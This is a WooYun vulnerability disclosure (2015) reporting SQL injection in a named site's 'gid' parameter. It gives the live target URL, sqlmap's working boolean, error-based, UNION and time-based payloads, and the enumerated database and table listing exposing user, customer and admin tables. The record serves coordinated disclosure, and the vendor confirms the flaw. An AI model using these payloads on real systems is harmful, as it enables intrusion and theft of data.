当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0101907

漏洞标题:某站通用注入涉及多个数据库泄露

相关厂商:yaya888.com

漏洞作者: Ton7BrEak

提交时间:2015-03-18 14:53

修复时间:2015-05-03 09:24

公开时间:2015-05-03 09:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-18: 细节已通知厂商并且等待厂商处理中
2015-03-19: 厂商已经确认,细节仅向厂商公开
2015-03-29: 细节向核心白帽子及相关领域专家公开
2015-04-08: 细节向普通白帽子公开
2015-04-18: 细节向实习白帽子公开
2015-05-03: 细节向公众公开

简要描述:

某站通用注入涉及多个数据库泄露

详细说明:

存在注入的url为:
http://xw.yaya888.com/app/priceline/data.php?gid=5876&code=1426571413
其中参数gid存在注入
其中xw为城市,更换不同的城市进行测试都存在注入~就不一一证明了。

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: gid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: gid=5876 AND 5125=5125&code=1426571413
Vector: AND [INFERENCE]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: gid=5876 AND (SELECT 5884 FROM(SELECT COUNT(*),CONCAT(0x3a6b6f613a,(SELECT (CASE WHEN (
5884=5884) THEN 1 ELSE 0 END)),0x3a6e67793a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SET
S GROUP BY x)a)&code=1426571413
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMI
TER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: gid=5876 UNION ALL SELECT NULL,CONCAT(0x3a6b6f613a,0x774374424e6e504e7268,0x3a6e67793a)
#&code=1426571413
Vector: UNION ALL SELECT NULL,[QUERY]#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: gid=5876 AND SLEEP(5)&code=1426571413
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
[16:02:51] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008
web application technology: Microsoft IIS 7.5, ASP.NET, PHP 5.2.8
back-end DBMS: MySQL 5.0

漏洞证明:

跑出的数据库信息

[*] baobao
[*] information_schema
[*] kmyaya
[*] kmyaya6
[*] kmyaya_bak
[*] kmyaya_bak2
[*] kmyaya_bak3
[*] mysql
[*] test
[*] yaya_appapi


当前数据库

Database: kmyaya
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| oa_stock_archive | 4155088 |
| oa_stock_detail | 2225685 |
| oa_document | 678263 |
| oa_user_login | 632568 |
| oa_stock | 582247 |
| oa_money_detail | 353657 |
| oa_customer_log | 279383 |
| oa_customer | 190011 |
| sys_search | 170894 |
| oa_ip | 169942 |
| oa_service | 133201 |
| sys_goods_price | 119660 |
| oa_stock_booking | 114993 |
| oa_stock_move | 110226 |
| oa_iplogin | 88559 |
| oa_user_log | 83881 |
| sys_goods_price_edit | 72332 |
| sys_goods_with | 40973 |
| sys_image | 38477 |
| sys_weixin_openid | 37473 |
| sys_comment | 36566 |
| sys_user_login_log | 28099 |
| coupon_verify | 24815 |
| sys_admin_login | 23900 |
| sys_member_care | 23356 |
| webapp_init_log | 23220 |
| sys_member_login | 22764 |
| game_zhuanpan_open | 22118 |
| sys_weixin_qrcode | 19966 |
| sms_sended | 19732 |
| sys_push_log | 16359 |
| sys_member | 14638 |
| game_zhuanpan_open_bak | 12594 |
| sys_order_list | 11279 |
| sys_article | 11258 |
| oa_stock_inventory | 10715 |
| sys_tracert | 10456 |
| sys_goods_product | 10018 |
| lottery_log | 10002 |
| sys_yhm_codes | 9885 |
| game_zhuanpan_user | 9785 |
| sys_order | 9700 |
| oa_wx_status | 9179 |
| sys_verify | 7373 |
| coupon_visits | 6842 |
| oa_active_order | 6592 |
| sys_admin_log | 6003 |
| game_zhuanpan_user_bak | 5271 |
| sys_district | 5026 |
| sys_client_question | 4967 |
| sys_goods | 4664 |
| sys_weixin_user | 4353 |
| sys_cup_taking | 3903 |
| sys_goods_package | 3636 |
| sys_address | 3385 |
| sys_cup_comment | 2433 |
| sys_user_everyday | 2266 |
| sys_weixin_zan | 2229 |
| sys_cart | 2172 |
| oa_computer | 2023 |
| sys_weixin_token | 1985 |
| game_zhuanpan_gift | 1901 |
| oa_offer_code | 1662 |
| game_zhuanpan_gift_bak | 1151 |
| sys_game_user | 1133 |
| sms_sending | 1000 |
| sys_cprice | 986 |
| sys_weixin_user_msg | 844 |
| sys_game_gift | 782 |
| sys_game_order | 778 |
| game_cd_gift | 743 |
| sys_send_address | 690 |
| oa_user | 686 |
| oa_active_log | 663 |
| sys_bai_nian | 533 |
| game_cd_user | 489 |
| oa_personnel_files | 460 |
| oa_article | 456 |
| sys_help_article | 435 |
| sys_soft | 348 |
| sys_soft_ver | 340 |
| sys_nianhui_scores | 290 |
| game_zhuanpan_pici | 281 |
| sys_nianhui_uses | 232 |
| sys_weixin_yaya | 228 |
| sys_nianhui_user | 182 |
| sys_app_fenlei | 173 |
| sys_advertisement | 156 |
| coupon_stuff | 147 |
| sys_tearch_msg | 125 |
| sys_ads | 113 |
| sys_brands | 109 |
| sys_actgoods | 103 |
| sys_yhm_rules | 98 |
| oa_modlist | 91 |
| sys_goods_with_price | 86 |
| sys_product_cat | 84 |
| sys_hot_links | 81 |
| sys_goods_cat | 80 |
| sys_brand | 70 |
| oa_set_parameter | 66 |
| sys_cup_match | 64 |
| sys_nav | 64 |
| oa_set_depart | 62 |
| sys_ad_position | 57 |
| sys_goods_type | 51 |
| sys_client_phone | 46 |
| oa_usergroup | 45 |
| sys_friendlink | 44 |
| sys_admin | 37 |
| oa_set_shop | 33 |
| sys_knowledge | 33 |
| sys_index_goods | 32 |
| sys_order_price_edit | 31 |
| oa_money_account | 29 |
| sys_phone_zhuanti | 29 |
| oa_money_class | 27 |
| sys_client_company | 27 |
| webapp_auth_login | 26 |
| sys_shops | 25 |
| sys_yhm_codes3 | 24 |
| lottery_activity | 23 |
| oa_url | 23 |
| sys_sites_shop | 22 |
| lottery | 21 |
| sys_shop | 21 |
| sms_tpl | 18 |
| sys_byself | 17 |
| oa_reset | 13 |
| sys_friend_link | 13 |
| webapp_point | 13 |
| sys_contract_config | 12 |
| sys_sites | 12 |
| sys_nianhui_shows | 11 |
| oa_offer_task | 10 |
| sys_wxmoney_test | 10 |
| coupon_con | 8 |
| oa_set_member_rank | 8 |
| sys_article_cat | 8 |
| webapp_upload_image | 8 |
| webapp_upload_voice | 7 |
| sys_game_batch | 6 |
| oa_qwgh | 5 |
| sys_ad | 4 |
| sys_codesend | 4 |
| sys_nav_type | 4 |
| sys_contract_a | 3 |
| sys_game_type | 3 |
| sys_group | 3 |
| sys_phone_zhuanti_tpl | 3 |
| sys_specialprice | 3 |
| webapp_share | 3 |
| oa_customer_score_log | 2 |
| sys_shopcart | 2 |
| sys_site | 2 |
| webapp_init | 2 |
| oa_offer_event | 1 |
| sms_user | 1 |
| sys_contract | 1 |
| sys_phone_num | 1 |
| sys_up_views | 1 |
| sys_web_youhui | 1 |
+------------------------+---------+


数据库用户密码

001.jpg

修复方案:

版权声明:转载请注明来源 Ton7BrEak@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-03-19 09:22

厂商回复:

非常感谢,这都是同一个原因造成的正在修复

最新状态:

暂无